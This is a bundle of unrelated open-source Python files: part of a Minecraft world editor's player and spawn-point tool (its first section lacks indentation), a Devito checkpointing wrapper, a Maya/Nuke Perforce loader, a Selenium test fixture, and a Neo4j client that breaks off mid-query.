raise SpawnPositionInvalid(
"You cannot have two air blocks at Y=63 and Y=64 in your spawn point's column. Additionally, you cannot have a solid block in the three blocks above your spawn point. It's weird, I know.")
'''
self.undoPos = level.playerSpawnPosition()
level.setPlayerSpawnPosition(self.pos)
self.tool.markerList.invalidate()
self.canUndo = True
def undo(self):
if self.undoPos is not None:
level = self.tool.editor.level
self.redoPos = level.playerSpawnPosition()
level.setPlayerSpawnPosition(self.undoPos)
self.tool.markerList.invalidate()
def redo(self):
if self.redoPos is not None:
level = self.tool.editor.level
self.undoPos = level.playerSpawnPosition()
level.setPlayerSpawnPosition(self.redoPos)
self.tool.markerList.invalidate()
class PlayerPositionPanel(Panel):
def __init__(self, tool):
Panel.__init__(self, name='Panel.PlayerPositionPanel')
self.tool = tool
self.player_UUID = {"UUID": [], "Name": []}
self.level = tool.editor.level
self.playercache = PlayerCache()
# Add this instance to PlayerCache 'targets'. PlayerCache generated processes will call
# this instance 'update_player' method when they have finished their execution.
self.playercache.add_target(self.update_player)
if hasattr(self.level, 'players'):
players = self.level.players or ["[No players]"]
if not self.level.oldPlayerFolderFormat:
for player in players:
if player != "Player" and player != "[No players]":
if len(player) > 4 and player[4] == "-":
os.rename(os.path.join(self.level.worldFolder.getFolderPath("playerdata"), player+".dat"), os.path.join(self.level.worldFolder.getFolderPath("playerdata"), player.replace("-", "", 1)+".dat"))
player = player.replace("-", "", 1)
# print 5
data = self.playercache.getPlayerInfo(player, use_old_data=True)
#self.player_UUID[data[0]] = data[1]
self.player_UUID["UUID"].append(data[0])
self.player_UUID["Name"].append(data[1])
#self.player_UUID[player] = data
if "Player" in players:
#self.player_UUID["Player (Single Player)"] = "Player"
self.player_UUID["UUID"].append("Player")
self.player_UUID["Name"].append("Player (Single Player)")
if "[No players]" not in players:
self.player_names = sorted(self.player_UUID.values(), key=lambda x: False if x == "Player (Single Player)" else x)
else:
self.player_UUID["UUID"].append("[No players]")
self.player_UUID["Name"].append("[No players]")
else:
players = ["Player (Single Player)"]
self.players = players
if 'Player' in self.player_UUID['UUID'] and 'Player (Single Player)' in self.player_UUID['Name']:
self.player_UUID['UUID'].insert(0, self.player_UUID['UUID'].pop(self.player_UUID['UUID'].index('Player')))
self.player_UUID['Name'].insert(0, self.player_UUID['Name'].pop(self.player_UUID['Name'].index('Player (Single Player)')))
self.pages = TabPanel()
tab_height = self.pages.tab_height
max_height = tab_height + self.tool.editor.mainViewport.height - self.tool.editor.toolbar.height - self.tool.editor.subwidgets[0].height - self.pages.margin * 2
#-# Uncomment the following line to have a maximum height for this panel.
# max_height = min(max_height, 500)
self.editNBTDataButton = Button("Edit NBT", action=self.editNBTData, tooltipText="Open the NBT Explorer to edit player's attributes and inventory")
addButton = Button("Add", action=self.tool.addPlayer)
removeButton = Button("Remove", action=self.tool.removePlayer)
gotoButton = Button("Goto", action=self.tool.gotoPlayer)
gotoCameraButton = Button("Goto View", action=self.tool.gotoPlayerCamera)
moveButton = Button("Move", action=self.tool.movePlayer)
moveToCameraButton = Button("Align to Camera", action=self.tool.movePlayerToCamera)
reloadSkin = Button("Reload Skins", action=self.tool.reloadSkins, tooltipText="This pulls skins from the online server, so this may take a while")
btns = [self.editNBTDataButton]
if not isinstance(self.level, pymclevel.leveldbpocket.PocketLeveldbWorld):
btns.extend([addButton, removeButton])
btns.extend([gotoButton, gotoCameraButton, moveButton, moveToCameraButton, reloadSkin])
btns = Column(btns, margin=0, spacing=2)
h = max_height - btns.height - self.pages.margin * 2 - 2 - self.font.get_linesize() * 2
col = Label('')
def close():
self.pages.show_page(col)
self.nbttree = NBTExplorerToolPanel(self.tool.editor, nbtObject={}, height=max_height, \
close_text="Go Back", no_header=True, close_action=close,
load_text=None)
self.nbttree.shrink_wrap()
self.nbtpage = Column([self.nbttree])
self.nbtpage.shrink_wrap()
self.pages.add_page("NBT Data", self.nbtpage)
self.pages.set_rect(map(lambda x:x+self.margin, self.nbttree._rect))
tableview = TableView(nrows=(h - (self.font.get_linesize() * 2.5)) / self.font.get_linesize(),
header_height=self.font.get_linesize(),
columns=[TableColumn("Player Name(s):", (self.nbttree.width - (self.margin * 3)) / 3),
TableColumn("Player UUID(s):", (self.nbttree.width - (self.margin * 3)))],
)
tableview.index = 0
tableview.num_rows = lambda: len(self.player_UUID["UUID"])
tableview.row_data = lambda i: (self.player_UUID["Name"][i],self.player_UUID["UUID"][i])
tableview.row_is_selected = lambda x: x == tableview.index
tableview.zebra_color = (0, 0, 0, 48)
def selectTableRow(i, evt):
tableview.index = i
tableview.click_row = selectTableRow
def mouse_down(e):
if e.button == 1 and e.num_clicks > 1:
self.editNBTData()
TableRowView.mouse_down(tableview.rows, e)
tableview.rows.mouse_down = mouse_down
tableview.rows.tooltipText = "Double-click or use the button below to edit the NBT Data."
self.table = tableview
col.set_parent(None)
self.col = col = Column([tableview, btns], spacing=2)
self.pages.add_page("Players", col, 0)
self.pages.shrink_wrap()
self.pages.show_page(col)
self.add(self.pages)
self.shrink_wrap()
self.max_height = max_height
def editNBTData(self):
player = self.selectedPlayer
if player == 'Player (Single Player)':
alert("Not yet implemented.\nUse the NBT Explorer to edit this player.")
elif player == '[No players]':
return
else:
player = self.level.getPlayerTag(self.selectedPlayer)
if player is not None:
self.pages.remove_page(self.nbtpage)
def close():
self.pages.show_page(self.col)
self.nbttree = NBTExplorerToolPanel(self.tool.editor, nbtObject=player, fileName=None,
savePolicy=-1, dataKeyName=None,
height=self.max_height, no_header=True, close_text="Go Back",
close_action=close, load_text=None,
copy_data=False)
self.nbtpage = Column([self.nbttree,])
self.nbtpage.shrink_wrap()
self.pages.add_page("NBT Data", self.nbtpage)
self.pages.show_page(self.nbtpage)
else:
alert(_("Unable to load player %s" % self.selectedPlayer()))
@property
def selectedPlayer(self):
if not self.level.oldPlayerFolderFormat:
player = self.players[self.table.index]
if player != "Player (Single Player)" and player != "[No players]" and player != "~local_player":
return self.player_UUID["UUID"][self.table.index]
else:
return player
else:
return self.players[self.table.index]
    def key_down(self, evt):
        self.dispatch_key('key_down', evt)

    def dispatch_key(self, name, evt):
        if not hasattr(evt, 'key'):
            return
        if name == "key_down":
            keyname = self.root.getKey(evt)
            if self.pages.current_page == self.col:
                if keyname == "Up" and self.table.index > 0:
                    self.table.index -= 1
                    self.table.rows.scroll_to_item(self.table.index)
                elif keyname == "Down" and self.table.index < len(self.players) - 1:
                    self.table.index += 1
                    self.table.rows.scroll_to_item(self.table.index)
                elif keyname == 'Page down':
                    self.table.index = min(len(self.players) - 1, self.table.index + self.table.rows.num_rows())
                elif keyname == 'Page up':
                    self.table.index = max(0, self.table.index - self.table.rows.num_rows())
                elif keyname == 'Return':
                    if self.selectedPlayer:
                        self.editNBTData()
                if self.table.rows.cell_to_item_no(0, 0) + self.table.rows.num_rows() - 1 > self.table.index \
                        or self.table.rows.cell_to_item_no(0, 0) + self.table.rows.num_rows() - 1 < self.table.index:
                    self.table.rows.scroll_to_item(self.table.index)
            elif self.pages.current_page == self.nbtpage:
                self.nbttree.dispatch_key(name, evt)

    def update_player(self, data):
        if isinstance(data, tuple):
            if data[0] in self.player_UUID['UUID']:
                idx = self.player_UUID['UUID'].index(data[0])
                self.player_UUID['UUID'][idx] = data[0]
                self.player_UUID['Name'][idx] = data[1]


class PlayerPositionTool(EditorTool):
    surfaceBuild = True
    toolIconName = "player"
    tooltipText = "Players"
    movingPlayer = None
    recordMove = True

    def reloadTextures(self):
        self.charTex = loadPNGTexture('char.png')

    @alertException
    def addPlayer(self):
        op = PlayerAddOperation(self)
        self.editor.addOperation(op)
        if op.canUndo:
            self.editor.addUnsavedEdit()

    @alertException
    def removePlayer(self):
        player = self.panel.selectedPlayer
        if player != "[No players]":
            op = PlayerRemoveOperation(self, player)
            self.editor.addOperation(op)
            if op.canUndo:
                self.editor.addUnsavedEdit()

    @alertException
    def movePlayer(self):
        if self.panel.selectedPlayer != "[No players]":
            self.movingPlayer = self.panel.selectedPlayer
            if self.movingPlayer == "Player (Single Player)":
                self.movingPlayer = "Player"

    @alertException
    def movePlayerToCamera(self):
        player = self.panel.selectedPlayer
        if player == "Player (Single Player)":
            player = "Player"
        if player != "[No players]":
            pos = self.editor.mainViewport.cameraPosition
            y = self.editor.mainViewport.yaw
            p = self.editor.mainViewport.pitch
            op = PlayerMoveOperation(self, pos, player, (y, p))
            self.movingPlayer = None
            self.editor.addOperation(op)
            if op.canUndo:
                self.editor.addUnsavedEdit()

    def delete_skin(self, uuid):
        del self.playerTexture[uuid]
        self.playerTexture[uuid] = self.charTex

    @alertException
    def reloadSkins(self):
        # result = ask("This pulls skins from the online server, so this may take a while", ["Ok", "Cancel"])
        # if result == "Ok":
        try:
            for player in self.editor.level.players:
                if player != "Player" and player in self.playerTexture.keys():
                    del self.playerTexture[player]
                    # print 6
                    r = self.playercache.getPlayerSkin(player, force_download=True, instance=self)
                    if isinstance(r, (str, unicode)):
                        r = r.join()
                    self.playerTexture[player] = loadPNGTexture(r)
            # self.markerList.call(self._drawToolMarkers)
        except:
            raise Exception("Could not connect to the skins server, please check your Internet connection and try again.")

    def gotoPlayerCamera(self):
        player = self.panel.selectedPlayer
        if player == "Player (Single Player)":
            player = "Player"
        try:
            pos = self.editor.level.getPlayerPosition(player)
            y, p = self.editor.level.getPlayerOrientation(player)
            self.editor.gotoDimension(self.editor.level.getPlayerDimension(player))
            self.editor.mainViewport.cameraPosition = pos
            self.editor.mainViewport.yaw = y
            self.editor.mainViewport.pitch = p
            self.editor.mainViewport.stopMoving()
            self.editor.mainViewport.invalidate()
        except pymclevel.PlayerNotFound:
            pass

    def gotoPlayer(self):
        player = self.panel.selectedPlayer
        if player == "Player (Single Player)":
            player = "Player"
        try:
            if self.editor.mainViewport.pitch < 0:
                self.editor.mainViewport.pitch = -self.editor.mainViewport.pitch
                self.editor.mainViewport.cameraVector = self.editor.mainViewport._cameraVector()
            cv = self.editor.mainViewport.cameraVector
            pos = self.editor.level.getPlayerPosition(player)
            pos = map(lambda p, c: p - c * 5, pos, cv)
            self.editor.gotoDimension(self.editor.level.getPlayerDimension(player))
            self.editor.mainViewport.cameraPosition = pos
            self.editor.mainViewport.stopMoving()
        except pymclevel.PlayerNotFound:
            pass
    def __init__(self, *args):
        EditorTool.__init__(self, *args)
        self.reloadTextures()
        self.nonSavedPlayers = []

        textureVerticesHead = numpy.array(
            (
                # Backside of Head
                24, 16,  # Bottom Left
                24, 8,  # Top Left
                32, 8,  # Top Right
                32, 16,  # Bottom Right

                # Front of Head
                8, 16,
                8, 8,
                16, 8,
                16, 16,

                #
                24, 0,
                16, 0,
                16, 8,
                24, 8,

                #
                16, 0,
                8, 0,
                8, 8,
                16, 8,

                #
                8, 8,
                0, 8,
                0, 16,
                8, 16,

                16, 16,
                24, 16,
                24, 8,
                16, 8,
            ), dtype='f4')

        textureVerticesHat = numpy.array(
            (
                56, 16,
                56, 8,
                64, 8,
                64, 16,

                48, 16,
                48, 8,
                40, 8,
                40, 16,

                56, 0,
                48, 0,
                48, 8,
                56, 8,

                48, 0,
                40, 0,
                40, 8,
                48, 8,

                40, 8,
                32, 8,
                32, 16,
                40, 16,

                48, 16,
                56, 16,
                56, 8,
                48, 8,
            ), dtype='f4')

        textureVerticesHead.shape = (24, 2)
        textureVerticesHat.shape = (24, 2)

        textureVerticesHead *= 4
        textureVerticesHead[:, 1] *= 2

        textureVerticesHat *= 4
        textureVerticesHat[:, 1] *= 2

        self.texVerts = (textureVerticesHead, textureVerticesHat)

        self.playerPos = {0: {}, -1: {}, 1: {}}
        self.playerTexture = {}
        self.revPlayerPos = {0: {}, -1: {}, 1: {}}
        self.inOtherDimension = {0: [], 1: [], -1: []}
        self.playercache = PlayerCache()

        self.markerList = DisplayList()
    panel = None

    def showPanel(self):
        if not self.panel:
            self.panel = PlayerPositionPanel(self)

        self.panel.centery = (self.editor.mainViewport.height - self.editor.toolbar.height) / 2 + self.editor.subwidgets[0].height
        self.panel.left = self.editor.left

        self.editor.add(self.panel)

    def hidePanel(self):
        if self.panel and self.panel.parent:
            self.panel.parent.remove(self.panel)
        self.panel = None

    def drawToolReticle(self):
        if self.movingPlayer is None:
            return

        pos, direction = self.editor.blockFaceUnderCursor
        dim = self.editor.level.getPlayerDimension(self.movingPlayer)
        pos = (pos[0], pos[1] + 2, pos[2])
        x, y, z = pos
        # x, y, z = map(lambda p, d: p + d, pos, direction)

        GL.glEnable(GL.GL_BLEND)
        GL.glColor(1.0, 1.0, 1.0, 0.5)
        self.drawCharacterHead(x + 0.5, y + 0.75, z + 0.5, self.revPlayerPos[dim][self.movingPlayer], dim)
        GL.glDisable(GL.GL_BLEND)

        GL.glEnable(GL.GL_DEPTH_TEST)
        self.drawCharacterHead(x + 0.5, y + 0.75, z + 0.5, self.revPlayerPos[dim][self.movingPlayer], dim)
        drawTerrainCuttingWire(BoundingBox((x, y, z), (1, 1, 1)))
        drawTerrainCuttingWire(BoundingBox((x, y - 1, z), (1, 1, 1)))
        # drawTerrainCuttingWire(BoundingBox((x, y - 2, z), (1, 1, 1)))
        GL.glDisable(GL.GL_DEPTH_TEST)

    markerLevel = None

    def drawToolMarkers(self):
        if not config.settings.drawPlayerHeads.get():
            return
        if self.markerLevel != self.editor.level:
            self.markerList.invalidate()
            self.markerLevel = self.editor.level
        self.markerList.call(self._drawToolMarkers)

    def _drawToolMarkers(self):
        GL.glColor(1.0, 1.0, 1.0, 0.5)
        GL.glEnable(GL.GL_DEPTH_TEST)
        GL.glMatrixMode(GL.GL_MODELVIEW)
        for player in self.editor.level.players:
            try:
                pos = self.editor.level.getPlayerPosition(player)
                yaw, pitch = self.editor.level.getPlayerOrientation(player)
                dim = self.editor.level.getPlayerDimension(player)

                self.inOtherDimension[dim].append(player)
                self.playerPos[dim][pos] = player
                self.revPlayerPos[dim][player] = pos

                if player != "Player" and config.settings.downloadPlayerSkins.get():
                    # print 7
                    r = self.playercache.getPlayerSkin(player, force_download=False)
                    if not isinstance(r, (str, unicode)):
                        r = r.join()
                    self.playerTexture[player] = loadPNGTexture(r)
                else:
                    self.playerTexture[player] = self.charTex

                if dim != self.editor.level.dimNo:
                    continue

                x, y, z = pos
                GL.glPushMatrix()
                GL.glTranslate(x, y, z)
                GL.glRotate(-yaw, 0, 1, 0)
                GL.glRotate(pitch, 1, 0, 0)
                GL.glColor(1, 1, 1, 1)
                self.drawCharacterHead(0, 0, 0, (x, y, z), self.editor.level.dimNo)
                GL.glPopMatrix()
                # GL.glEnable(GL.GL_BLEND)
                drawTerrainCuttingWire(FloatBox((x - .5, y - .5, z - .5), (1, 1, 1)),
                                       c0=(0.3, 0.9, 0.7, 1.0),
                                       c1=(0, 0, 0, 0),
                                       )
                # GL.glDisable(GL.GL_BLEND)
            except Exception, e:
                print "Exception in editortools.player.PlayerPositionTool._drawToolMarkers:", repr(e)
                import traceback
                print traceback.format_exc()
                continue
        GL.glDisable(GL.GL_DEPTH_TEST)
    def drawCharacterHead(self, x, y, z, realCoords=None, dim=0):
        GL.glEnable(GL.GL_CULL_FACE)
        origin = (x - 0.25, y - 0.25, z - 0.25)
        size = (0.5, 0.5, 0.5)
        box = FloatBox(origin, size)

        hat_origin = (x - 0.275, y - 0.275, z - 0.275)
        hat_size = (0.55, 0.55, 0.55)
        hat_box = FloatBox(hat_origin, hat_size)

        if realCoords is not None and self.playerPos[dim][realCoords] != "Player" and config.settings.downloadPlayerSkins.get():
            drawCube(box,
                     texture=self.playerTexture[self.playerPos[dim][realCoords]], textureVertices=self.texVerts[0])
            GL.glEnable(GL.GL_BLEND)
            GL.glBlendFunc(GL.GL_SRC_ALPHA, GL.GL_ONE_MINUS_SRC_ALPHA)
            drawCube(hat_box,
                     texture=self.playerTexture[self.playerPos[dim][realCoords]], textureVertices=self.texVerts[1])
            GL.glDisable(GL.GL_BLEND)
        else:
            drawCube(box,
                     texture=self.charTex, textureVertices=self.texVerts[0])
        GL.glDisable(GL.GL_CULL_FACE)

    # @property
    # def statusText(self):
    #     if not self.panel:
    #         return ""
    #     player = self.panel.selectedPlayer
    #     if player == "Player":
    #         return "Click to move the player"
    #
    #     return _("Click to move the player \"{0}\"").format(player)

    @alertException
    def mouseDown(self, evt, pos, direction):
        if self.movingPlayer is None:
            return

        pos = (pos[0] + 0.5, pos[1] + 2.75, pos[2] + 0.5)
        op = PlayerMoveOperation(self, pos, self.movingPlayer)
        self.movingPlayer = None

        if self.recordMove:
            self.editor.addOperation(op)
            addingMoving = False
        else:
            self.editor.performWithRetry(op)  # Prevent recording of Undo when adding player
            self.recordMove = True
            addingMoving = True
        if op.canUndo and not addingMoving:
            self.editor.addUnsavedEdit()

    def keyDown(self, evt):
        keyname = evt.dict.get('keyname', None) or self.editor.get_root().getKey(evt)
        if not self.recordMove:
            if not pygame.key.get_focused():
                return
            if keyname == "Escape":
                self.recordMove = True
        if self.panel and self.panel.__class__ == PlayerPositionPanel:
            self.panel.key_down(evt)

    def keyUp(self, evt):
        pass

    def levelChanged(self):
        self.markerList.invalidate()

    @alertException
    def toolSelected(self):
        self.showPanel()
        self.movingPlayer = None

    @alertException
    def toolReselected(self):
        if self.panel:
            self.gotoPlayer()


class PlayerSpawnPositionOptions(ToolOptions):
    def __init__(self, tool):
        ToolOptions.__init__(self, name='Panel.PlayerSpawnPositionOptions')
        self.tool = tool
        self.spawnProtectionCheckBox = CheckBox(ref=AttrRef(tool, "spawnProtection"))
        self.spawnProtectionLabel = Label("Spawn Position Safety")
        self.spawnProtectionLabel.mouse_down = self.spawnProtectionCheckBox.mouse_down

        tooltipText = "Minecraft will randomly move your spawn point if you try to respawn in a column where there are no blocks at Y=63 and Y=64. Only uncheck this box if Minecraft is changed."
        self.spawnProtectionLabel.tooltipText = self.spawnProtectionCheckBox.tooltipText = tooltipText

        row = Row((self.spawnProtectionCheckBox, self.spawnProtectionLabel))
        col = Column((Label("Spawn Point Options"), row, Button("OK", action=self.dismiss)))

        self.add(col)
        self.shrink_wrap()


class PlayerSpawnPositionTool(PlayerPositionTool):
    surfaceBuild = True
    toolIconName = "playerspawn"
    tooltipText = "Move Spawn Point\nRight-click for options"

    def __init__(self, *args):
        PlayerPositionTool.__init__(self, *args)
        self.optionsPanel = PlayerSpawnPositionOptions(self)

    def toolEnabled(self):
        return self.editor.level.dimNo == 0

    def showPanel(self):
        self.panel = Panel(name='Panel.PlayerSpawnPositionTool')
        button = Button("Goto Spawn", action=self.gotoSpawn)
        self.panel.add(button)
        self.panel.shrink_wrap()

        self.panel.left = self.editor.left
        self.panel.centery = self.editor.centery
        self.editor.add(self.panel)

    def gotoSpawn(self):
        cv = self.editor.mainViewport.cameraVector
        pos = self.editor.level.playerSpawnPosition()
        pos = map(lambda p, c: p - c * 5, pos, cv)
        self.editor.mainViewport.cameraPosition = pos
        self.editor.mainViewport.stopMoving()

    @property
    def statusText(self):
        return "Click to set the spawn position."

    spawnProtection = config.spawn.spawnProtection.property()

    def drawToolReticle(self):
        pos, direction = self.editor.blockFaceUnderCursor
        x, y, z = map(lambda p, d: p + d, pos, direction)

        color = (1.0, 1.0, 1.0, 0.5)
        if isinstance(self.editor.level, pymclevel.MCInfdevOldLevel) and self.spawnProtection:
            if not positionValid(self.editor.level, (x, y, z)):
                color = (1.0, 0.0, 0.0, 0.5)

        GL.glColor(*color)
        GL.glEnable(GL.GL_BLEND)
        self.drawCage(x, y, z)
        self.drawCharacterHead(x + 0.5, y + 0.5, z + 0.5)
        GL.glDisable(GL.GL_BLEND)

        GL.glEnable(GL.GL_DEPTH_TEST)
        self.drawCage(x, y, z)
        self.drawCharacterHead(x + 0.5, y + 0.5, z + 0.5)
        color2 = map(lambda a: a * 0.4, color)
        drawTerrainCuttingWire(BoundingBox((x, y, z), (1, 1, 1)), color2, color)
        GL.glDisable(GL.GL_DEPTH_TEST)

    def _drawToolMarkers(self):
        x, y, z = self.editor.level.playerSpawnPosition()

        GL.glBlendFunc(GL.GL_SRC_ALPHA, GL.GL_ONE_MINUS_SRC_ALPHA)
        GL.glEnable(GL.GL_BLEND)

        color = config.selectionColors.black.get() + (0.35,)
        GL.glColor(*color)
        GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
        GL.glLineWidth(2.0)
        drawCube(FloatBox((x, y, z), (1, 1, 1)))
        GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
        drawCube(FloatBox((x, y, z), (1, 1, 1)))
        GL.glDisable(GL.GL_BLEND)

        GL.glEnable(GL.GL_DEPTH_TEST)
        GL.glColor(1.0, 1.0, 1.0, 1.0)
        self.drawCage(x, y, z)
        self.drawCharacterHead(x + 0.5, y + 0.5 + 0.125 * numpy.sin(self.editor.frames * 0.05), z + 0.5)
        GL.glDisable(GL.GL_DEPTH_TEST)

    def drawCage(self, x, y, z):
        cageTexVerts = numpy.array(pymclevel.MCInfdevOldLevel.materials.blockTextures[52, 0])

        pixelScale = 0.5 if self.editor.level.materials.name in ("Pocket", "Alpha") else 1.0
        texSize = 16 * pixelScale
        cageTexVerts = cageTexVerts.astype(float) * pixelScale

        cageTexVerts = numpy.array(
            [((tx, ty), (tx + texSize, ty), (tx + texSize, ty + texSize), (tx, ty + texSize)) for (tx, ty) in
             cageTexVerts], dtype='float32')

        GL.glEnable(GL.GL_ALPHA_TEST)
        drawCube(BoundingBox((x, y, z), (1, 1, 1)), texture=pymclevel.alphaMaterials.terrainTexture,
                 textureVertices=cageTexVerts)
        GL.glDisable(GL.GL_ALPHA_TEST)
    @alertException
    def mouseDown(self, evt, pos, direction):
        pos = map(lambda p, d: p + d, pos, direction)
        op = PlayerSpawnMoveOperation(self, pos)
        try:
            self.editor.addOperation(op)
            if op.canUndo:
                self.editor.addUnsavedEdit()
            self.markerList.invalidate()
        except SpawnPositionInvalid, e:
            if "Okay" != ask(str(e), responses=["Okay", "Fix it for me!"]):
                level = self.editor.level
                status = ""

                if not okayAt63(level, pos):
                    level.setBlockAt(pos[0], 63, pos[2], 1)
                    status += _("Block added at y=63.\n")

                if 59 < pos[1] < 63:
                    pos[1] = 63
                    status += _("Spawn point moved upward to y=63.\n")

                if not okayAboveSpawn(level, pos):
                    if pos[1] > 63 or pos[1] < 59:
                        lpos = (pos[0], pos[1] - 1, pos[2])
                        if level.blockAt(*pos) == 0 and level.blockAt(*lpos) != 0 and okayAboveSpawn(level, lpos):
                            pos = lpos
                            status += _("Spawn point shifted down by one block.\n")
                    if not okayAboveSpawn(level, pos):
                        for i in xrange(1, 4):
                            level.setBlockAt(pos[0], pos[1] + i, pos[2], 0)
                        status += _("Blocks above spawn point cleared.\n")

                self.editor.invalidateChunks([(pos[0] // 16, pos[2] // 16)])
                op = PlayerSpawnMoveOperation(self, pos)
                try:
                    self.editor.addOperation(op)
                    if op.canUndo:
                        self.editor.addUnsavedEdit()
                    self.markerList.invalidate()
                except SpawnPositionInvalid, e:
                    alert(str(e))
                    return

                if len(status):
                    alert(_("Spawn point fixed. Changes: \n\n") + status)

    @alertException
    def toolReselected(self):
        self.gotoSpawn()
# seismic/checkpointing/checkpoint.py (slimgroup/Devito-Examples, MIT)
# The MIT License (MIT)
#
# Copyright (c) 2016, Imperial College, London
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the
# following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from pyrevolve import Checkpoint, Operator
from devito import TimeFunction
from devito.tools import flatten

class CheckpointOperator(Operator):
    """Devito's concrete implementation of the ABC pyrevolve.Operator. This class wraps
    devito.Operator so it conforms to the pyRevolve API. pyRevolve will call apply
    with arguments t_start and t_end. Devito calls these arguments t_s and t_e so
    the following dict is used to perform the translations between different names.

    Parameters
    ----------
    op : Operator
        devito.Operator object that this object will wrap.
    args : dict
        If devito.Operator.apply() expects any arguments, they can be provided
        here to be cached. Any calls to CheckpointOperator.apply() will
        automatically include these cached arguments in the call to the
        underlying devito.Operator.apply().
    """
    t_arg_names = {'t_start': 'time_m', 't_end': 'time_M'}

    def __init__(self, op, **kwargs):
        self.op = op
        self.args = kwargs
        op_default_args = self.op._prepare_arguments(**kwargs)
        self.start_offset = op_default_args[self.t_arg_names['t_start']]

    def _prepare_args(self, t_start, t_end):
        args = self.args.copy()
        args[self.t_arg_names['t_start']] = t_start + self.start_offset
        args[self.t_arg_names['t_end']] = t_end - 1 + self.start_offset
        return args

    def apply(self, t_start, t_end):
        """If the devito operator requires some extra arguments in the call to apply
        they can be stored in the args property of this object so pyRevolve calls
        pyRevolve.Operator.apply() without caring about these extra arguments while
        this method passes them on correctly to devito.Operator
        """
        # Build the arguments list to invoke the kernel function
        args = self.op.arguments(**self._prepare_args(t_start, t_end))
        # Invoke kernel function with args
        arg_values = [args[p.name] for p in self.op.parameters]
        self.op.cfunction(*arg_values)


class DevitoCheckpoint(Checkpoint):
    """Devito's concrete implementation of the Checkpoint abstract base class provided by
    pyRevolve. Holds a list of symbol objects that hold data.
    """
    def __init__(self, objects):
        """Initialise a checkpoint object. Upon initialisation, a checkpoint
        stores only a reference to the objects that are passed into it."""
        assert all(isinstance(o, TimeFunction) for o in objects)
        dtypes = set([o.dtype for o in objects])
        assert len(dtypes) == 1
        self._dtype = dtypes.pop()
        self.objects = objects

    @property
    def dtype(self):
        return self._dtype

    def get_data(self, timestep):
        data = flatten([get_symbol_data(s, timestep) for s in self.objects])
        return data

    def get_data_location(self, timestep):
        return self.get_data(timestep)

    @property
    def size(self):
        """The memory consumption of the data contained in a checkpoint."""
        return sum([int((o.size_allocated / (o.time_order + 1)) * o.time_order)
                    for o in self.objects])

    def save(*args):
        raise RuntimeError("Invalid method called. Did you check your version" +
                           " of pyrevolve?")

    def load(*args):
        raise RuntimeError("Invalid method called. Did you check your version" +
                           " of pyrevolve?")


def get_symbol_data(symbol, timestep):
    timestep += symbol.time_order - 1
    ptrs = []
    for i in range(symbol.time_order):
        # Use `._data`, instead of `.data`, as `.data` is a view of the DOMAIN
        # data region which is non-contiguous in memory. The performance hit from
        # dealing with non-contiguous memory is so big (introduces >1 copy), it's
        # better to checkpoint unnecessary stuff to get a contiguous chunk of memory.
        ptr = symbol._data[timestep - i, :, :]
        ptrs.append(ptr)
    return ptrs
# Perforce/AppUtils.py (TomMinor/MayaPerforce, MIT)
import os
import sys
import re
import logging

p4_logger = logging.getLogger("Perforce")

# Import app specific utilities, maya opens scenes differently than nuke etc
# Are we in maya or nuke?
if re.match("maya", os.path.basename(sys.executable), re.I):
    p4_logger.info("Configuring for Maya")
    from MayaUtils import *
elif re.match("nuke", os.path.basename(sys.executable), re.I):
    p4_logger.info("Configuring for Nuke")
    from NukeUtils import *
else:
    p4_logger.warning("Couldn't find app configuration")
    raise ImportError("No supported applications found that this plugin can interface with")
# tests/conftest.py (artembashlak/share-youtube-to-mail, Apache-2.0)
import pytest
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager


@pytest.fixture(scope="function")
def browser():
    options = webdriver.ChromeOptions()
    options.add_argument('ignore-certificate-errors')
    options.add_argument("--headless")
    options.add_argument('--no-sandbox')
    options.add_argument('start-maximized')
    options.add_argument('disable-infobars')
    options.add_argument("--disable-extensions")
    driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
    yield driver
    driver.quit()
# crusoe_observe/neo4j-client/neo4jclient/CMSClient.py (CSIRT-MU/CRUSOE, MIT)
from neo4jclient.AbsClient import AbstractClient


class CMSClient(AbstractClient):
    def __init__(self, password, **kwargs):
        super().__init__(password=password, **kwargs)

    def get_domain_names(self):
        """
        Gets all domain names from database.

        :return: domain names in JSON-like form
        """
        return self._run_query("MATCH(n:DomainName) RETURN n.domain_name AS domains")

    def get_ips_and_domain_names(self):
        """
        Gets all domain names with corresponding IPs from database.

        :return: IPs and DomainNames in JSON-like form
        """
        return self._run_query("MATCH(n:IP)-[:RESOLVES_TO]-(y:DomainName {tag: \'A/AAAA\'}) "
                               "RETURN { IP: n.address , Domain: y.domain_name } AS entry")

    def create_cms_component(self, path):
        """
        Create nodes and relationships for cms client.
        -------------
        Antivirus_query:
        1. Parse csv given in path.
        2. Create node of type [:SoftwareVersion, :IP] if not already exists.
        3. Create node of type [:Host], relationship of type [:ON] with parameters [start,end] if not already exists.
           Otherwise just update information about time on parameters [start,end].
        4. Create node of type [:Node], relationship of type [:HAS_ASSIGNED].
        5. Create relationship of type [:IS_A] between :Host and :Node if not already exists.

        :param path: Path to the JSON with values
        :return:
        """
        path = f'file:///{path}'

        query = "CALL apoc.load.json($path) " \
                "YIELD value " \
                "UNWIND value.data AS data " \
                "UNWIND data.cpe as cpe " \
                "WITH data.ip as ip_ad, cpe, value.time as theTime " \
                "MERGE (ipadd:IP {address: ip_ad}) " \
                "MERGE (softVersion:SoftwareVersion {version: cpe, tag: \'cms_client\'}) " \
                "MERGE (ipadd)<-[:HAS_ASSIGNED]-(nod:Node) " \
                "MERGE (nod)-[:IS_A]->(host:Host) " \
